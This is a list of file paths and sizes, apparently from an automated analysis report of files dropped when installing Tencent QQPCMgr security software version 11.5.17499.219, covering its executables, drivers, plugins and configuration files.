%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\SMFilter.etf (769 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCLeakScan\QQPCLeakScan.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdFilter.exe (4372 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1231.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TxArp6.inf (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\QMHPGarbageScan\HPGarbageScannerConf.xml (83 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\8.0.50727.4053.Policy (804 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_660.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1105.dat (453 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\OptimizeExDll.dll (5209 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOKernelXP.sys (289 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_2061.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1085.dat (447 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysgarbagejmp\SysGarbageJmp.dll (416 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_907.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\QQPCCommonMgr.rdb (15021 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSClinicWebFix.dll (1775 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\adplugin\QMAdFilter(big).png (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\SubRdbs\speedupmsg.rdb (151 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\config\CategoryConfig.xml (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\BugReportRule.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\GF.dll (25490 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_891.png (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\sqlite.dll (4892 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMPersonalCenter.exe (5977 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSpecTips\QMSpecTips.rdb (83 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\NiZhanConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCHwVedioDetect.dll (1629 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmupdatemodule\QMUpdateModule.dll (2416 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\BrowserInfo.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\RtpPage\RtpPage.rdb (267 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\hpclinicscanplugin\HPClinicScanPlugin.dll (2579 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSMalFilter.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftGame.exe (6194 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\QQPCMgrUpdate.rdb (274 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\exnscan64.dll (6525 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1609.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FZLTCXHJW.TTF (9606 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1997.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1029.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\MalWare.rdb (168 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibfloat.xml (294 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1610.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMShield64.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMClinicTrayPlugin\QMClinicTrayPlugin.tpc (701 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ProcInfo.etf (97 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSKsp.sys (2971 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\DownloadStrategy.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDeskTopGC.dat (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.ATL\8.0.50727.4053.Policy (804 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdFilter.rdb (180 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HW_SPGameScore.dat (925 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftTrayTips.exe (11094 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSWebMon.dat (6555 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMPluginMgr.dll (10396 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMNetworkMgr.dll (2787 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMCommon.dll (8811 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\X5Config.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1033.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\data\support.etf (10 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\dr.dll (5495 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_706.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1436.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftMgr.exe (13004 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\DownloaderMgrUI.png (309 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\TestMSVCR_64.exe (16 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\SysGarbageJmp.png (515 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMHIPSHeart.dll (1136 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSSysKitProxy.dll (1724 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\Quarantine_Cache\sqlite.dll (3073 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\UninstallScan.etf (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\libjpegturbo.dll (3590 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSBlueScreenbak.xml (80 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMLogCtrl\QMLogCtrl.tpc (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysgarbagejmp\SysCleanPage.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUsbGuard.rdb (119 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSRunner.dll (1126 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAccountProtection.dat (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.ATL\8.0.50727.4053.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TVL00000.tvl (11 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1110.dat (454 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_559.png (2 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\AdBlock\adconfig.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOAccelerator64.sys (142 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOBusinessCfg.etf (284 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FtSysCommonMgrGF.dat (480 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVCache.dll (5471 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\zspic.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCClinicHelper.exe (1018 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\msvcm80.dll (4106 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SpeedupPlugins.etf (796 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMAVTrayPlugin.rdb (135 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMMobileSettingCenter\QMMobileSettingCenter.dll (1592 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_87.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1088.dat (449 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMHIPSPolicyEng.dll (7108 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1410.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\IEStartPage.png (433 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1103.dat (446 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1383.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\NetflowMgr.dll (2463 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMFileMonFrc.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virstr00.def (692 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\libexpatw.dll (1565 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSWebDownLoadProtect.dll (777 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSSysKit.sys (1385 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\SubRdbs\speedupmsg.tpc (710 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSWebMon64.dat (1704 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\dlcore.dll (15278 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSysOptimizeAssist\denoiser_info.ini (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\GF.dll (34298 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\sTurnOnAdapter.png (16 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMGameAssistantPlugin\QMGameAssistantPlugin.rdb (18 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_528.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMNetflowOpti.png (928 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1102.dat (455 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftBaseInfoForFileOpen.etf (9 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\QQPCCommonMgr.rdb (15789 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSysRepProv.dat (32 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRtpCheck.dll (4823 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\libpng.dll (1215 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\tab_icon_sys_opt_sys_homepage.png (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCWifiSafe.png (816 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HW_GameScore.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1227.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_949.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCClinicNet.png (883 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMRepairPlugin.dll (1793 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMKCheck\QMKCheck.dll (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\Microsoft.VC80.CRT.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\libpng.dll (643 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\TraceClear\TraceClear.rdb (158 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUAgent.dll (4091 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1099.dat (447 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysspeedupjmp\SysSpeedUpJmp.dll (405 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGCShellExt64.dll (6370 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\PluginInstaller.exe (2528 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMLogCtrl\QMLogCtrl.rdb (158 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\HPVulScan\HPVulScan.dll (1029 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\unstag.etf (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMFileMon.dll (6571 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVUpload.dll (4333 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUL.dll (3677 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMContextScan.dll (1674 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1200.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\Microsoft.VC80.CRT.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftMgr.rdb (317 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmudiskmgr\QMUDiskMgr.rdb (273 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Images\MyPhone_Notify.ico (292 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QOLogo\QQPCLaunch.png (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetConnect\QMNetConnectDll.dll (1270 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\SysOptimize.png (597 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1023.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1002.dat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMStartupMonitorNotify\whitelist.etf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMVulPlugin\QMVulPlugin.rdb (97 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDLP.dat (688 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOAccelerator.sys (2520 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSysOptimizeAssist\QMSysOptimizeAssist.rdb (137 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_691.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCTray.exe (2818 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\MemDefragWhiteList.etf (211 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMMalCoreCfgV1.dat (3714 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\AppMarketPlugin.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPConfig.dat (704 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOKernel64.sys (1025 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQSysMon.sys (2373 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameSpeedup.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCHardware.dll (3699 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMMobileTrayPlugin\QMMobileTrayPlugin.tpc (698 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_571.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_112.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_794.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\Bin\SSOPlatform.dll (13792 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRouterMgr.exe (2794 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\smanalyplugin\SMAnalyPlugin.rdb (1729 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\Bin\SSOLUIControl.dll (5819 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSRunner.DAT (717 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\PrefetchConfig.etf (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TxArp_64.sys (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCVulPlugin\QMSCVulPlugin.rdb (19 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftMgr.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1604.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\PluginInfo.xml (37 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMFeedBack.dat (704 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSysOptimize.dat (848 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Images\softmgr.ico (289 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAssLibHlp.dll (1613 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TxArp6.sys (27 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\Common.dll (28727 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSecScanLib.dll (216 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1034.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1302.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPIEStartPage\QMTPIEStartPage.tpc (676 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\Circle57.png (852 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGameAcceleratePlugin\QMGameAcceleratePlugin.tpc (723 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\xGraphic32.dll (2012 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGamePackagePlugin\QMGamePackagePlugin.rdb (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\DNFConfig.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\libjpegturbo.dll (3859 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Win10ToastNotification.dll (3603 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\jgIOStub.dll (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMAVTrayPlugin.tpc (703 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMGameSpeedup.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMTrojanScan\QMinfo.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMFeedBack.rdb (59 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTask.dat (600 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (468 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDeskTopGC.exe (5831 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\qmspeedupplugin\speeduprocket\SpeedupRocket.rdb (7972 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\qqpcuninstalljump.png (256 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SXComBase.dll (2097 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1096.dat (449 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\NodisturbOVList.etf (411 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdFilter.dat (696 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\qmspeedupplugin\speeduprocket\SpeedupRocket.tpc (721 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\IEStartPage.rdb (118 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMHIPSLogPolicy.dll (1306 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\QMNetMonDll.dll (62 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_898.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTencentNews.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\NetMon.png (424 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FilterService.ini (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\hptrojanscan\HPTrojanScanInfo.xml (62 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\8.0.50727.4053.policy (808 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMQQLoginPlugin\QMQQLoginPlugin.rdb (79 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\syshomepage.tpc (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameSpeedup.exe (8779 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SMobileAssisCfg.etf (323 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\jgImage.dll (716 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_131.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\jgIOStub.dll (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QQPCClinic_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1026.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAssistant\QMLOLAssistant\QMLOLAssistantShell.rdb (1624 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMHIPSService.dll (4987 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1106.dat (453 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tsmcp.DAT (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QOLogo\QQMobileMgr.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\WebShieldCFG.dat (9 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\NodisturbSGList.etf (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMExt.dll (1769 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1016.dat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1301.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Image\xpword.png (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1012.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GarbageClearV2.dat (155 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\HPInternalScan\HPInternalScan.dll (2208 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSccTrayPlugin\QMSccTrayPlugin.dll (4997 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1500.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1406.dat (969 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMWebFWCfg.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_133.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_352.png (2 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\TSVulFw_Cache\jsfeature.xml (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\SysHomePage.dll (23169 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\Startup.etf (1826 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tscpm.sys (1193 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftPolicy.etf (296 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\zlib.dll (567 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1412.dat (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdBlock.exe (6273 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUsbGuard.dat (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\UpdateTrayIcon.exe (2228 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMonPlugin.dll (1642 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSFSEngine.DAT (104 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\SysHomePage.rdb (7972 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\DownloaderMgrUI\DownloaderMgrUI.tpc (763 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\FIFAConfig.etf (3 bytes)
